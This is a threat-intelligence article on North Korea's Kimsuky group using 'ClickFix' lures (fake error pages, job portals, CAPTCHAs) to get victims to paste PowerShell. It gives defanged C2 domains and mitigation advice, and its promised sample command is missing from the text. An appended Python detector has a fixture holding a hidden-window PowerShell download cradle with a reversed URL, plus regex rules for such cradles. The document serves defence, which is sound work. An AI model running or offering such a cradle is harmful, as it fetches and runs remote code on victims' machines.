Diagram of the “BabyShark” Threat Series | Image: Genians
In its latest threat intelligence report, the Genians Security Center (GSC) has uncovered a new evolution in North Korean cyber operations—one that weaponizes social engineering to a chilling degree. The report reveals the expanded use of a deceptive strategy known as “ClickFix,” attributed to the state-sponsored APT group Kimsuky, which has been actively targeting experts and institutions through spear-phishing, fake job portals, and obfuscated PowerShell commands.
“ClickFix is a deceptive tactic that tricks users into unknowingly participating in the attack chain themselves,” the report warns.
The term “ClickFix” first surfaced in April 2024 through Proofpoint’s research, describing an attack where users, thinking they were fixing a browser error, copied PowerShell commands from a fake Chrome error message—unwittingly unleashing malware. By early 2025, GSC confirmed that Kimsuky had weaponized this technique, integrating it into their long-running “BabyShark” threat activity.
The brilliance—and danger—of ClickFix lies in its subtlety. Unlike typical phishing emails laden with red flags, ClickFix creates trust through familiarity. It masquerades as:
- A PDF manual with multilingual instructions
- A job application site for defense researchers
- A spoofed security settings page of a Korean web portal

One phishing case in March 2025 saw attackers impersonate a U.S. national security aide, asking the target to access a “secure document” using an “authentication code” from a text file. The catch? The code was actually a reverse-obfuscated PowerShell command, visually scrambled to avoid suspicion:
Upon execution, this command connected the victim’s machine to a command-and-control (C2) server, establishing persistence and harvesting sensitive information.
GSC’s report highlights multiple delivery methods:
- VBS-Based Spear Phishing: Targets were lured with interview requests, receiving a malicious VBS file via pCloud that initiated data exfiltration to the C2 domain konamo[.]xyz.
- Web-Based Exploits: A fake job portal prompted users to install Chrome Remote Desktop, giving attackers SSH-based remote access to the victim’s device.
- CAPTCHA Trickery: A counterfeit web portal asked users to complete a CAPTCHA, which led to PowerShell code execution disguised as routine security behavior.
All variations lead to a similar result: complete system compromise, often under familiar-looking file names such as HncUpdateTray.exe, an AutoIt script repurposed for data theft.
Beyond infrastructure overlap and malware reuse, the GSC report highlights something more subtle: linguistic fingerprints.
In phishing messages, North Korean-style vocabulary such as “래일” instead of “내일” (tomorrow), and terms like “지령” (command) and “체계 정보” (system information), betray the origin. This linguistic analysis strengthens attribution to Kimsuky, especially when combined with technical markers like recurring C2 addresses and code patterns.
Kimsuky’s infrastructure stretches across domains like raedom[.]store, securedrive.fin-tech[.]com, and kida.plusdocs.kro[.]kr, often hosted on South Korean and U.S.-based servers. IPs traced to China and Vietnam were also involved, indicating a geographically distributed operation.
The infection chain frequently uses Proton Drive or Google Drive for file delivery, further cloaking malicious files in legitimacy. The MD5 hashes and variant information provided by GSC suggest rapid iteration and targeted deployment.
“ClickFix is ultimately a psychological manipulation tactic that leads users to unknowingly run malicious commands, step by step, without recognizing the threat,” the GSC report emphasizes.
To mitigate such advanced threats, security teams must:
- Deploy Endpoint Detection and Response (EDR) tools to identify unusual command-line behavior.
- Invest in security awareness training—especially highlighting real-world attack simulations.
- Harden browsers and disable unnecessary PowerShell access for non-administrative users.
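As an added example (not from the GSC report or this article), the following Python triage scores process-creation events for the ClickFix pattern that the EDR and PowerShell-hardening advice above targets: an interactive shell started straight from explorer.exe with hidden-window flags, a download cradle and string-reversal obfuscation. The sample events, the indicator patterns and the alert threshold are constructed assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style; not from the GSC report.
SAMPLE_EVENTS = [
    # Pasted into Win+R: desktop-shell parent, hidden window, reversed string, download cradle.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"$u=-join('txt.edoc/moc.elpmaxe//:sptth'[-1..-28]);iwr $u\""},
    # Benign: an administrator exporting a service inventory from an open console.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service | Export-Csv svc.csv"},
]

# Interactive shells that ClickFix lures ask the victim to launch.
SHELL_RE = re.compile(r"\\(powershell|pwsh|mshta|cmd)\.exe$", re.IGNORECASE)

# Command-line indicators; each match adds one point. Patterns are this example's assumptions.
RULES = [
    ("hidden window or policy bypass",
     re.compile(r"-(w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|nop)\b", re.I)),
    ("encoded command",
     re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download cradle",
     re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|curl)\b", re.I)),
    ("string reversal or join obfuscation",
     re.compile(r"(\[array\]::reverse|-join\s*\(|\[-1\.\.-\d+\]|\[char\]\d+|\.tochararray\(\))", re.I)),
]


def analyze(event):
    """Score one event: returns (points, reasons). Non-shell images score zero."""
    reasons = []
    if not SHELL_RE.search(event["image"]):
        return 0, reasons
    # A shell whose parent is explorer.exe came from the Run dialog, a shortcut or a pasted
    # command, which is the path a ClickFix victim follows; scripts and consoles have other parents.
    if event["parent"].lower().endswith("\\explorer.exe"):
        reasons.append("shell launched directly from explorer.exe")
    for label, pattern in RULES:
        if pattern.search(event["cmdline"]):
            reasons.append(label)
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return the events whose indicator count reaches the threshold (an assumed cut-off)."""
    hits = []
    for event in events:
        points, reasons = analyze(event)
        if points >= threshold:
            hits.append({"cmdline": event["cmdline"], "points": points, "reasons": reasons})
    return hits
```

Feeding real Sysmon or EDR process events through `triage` surfaces the pasted-command launch even when the command text itself is scrambled, because the parent process and the flags are what give it away.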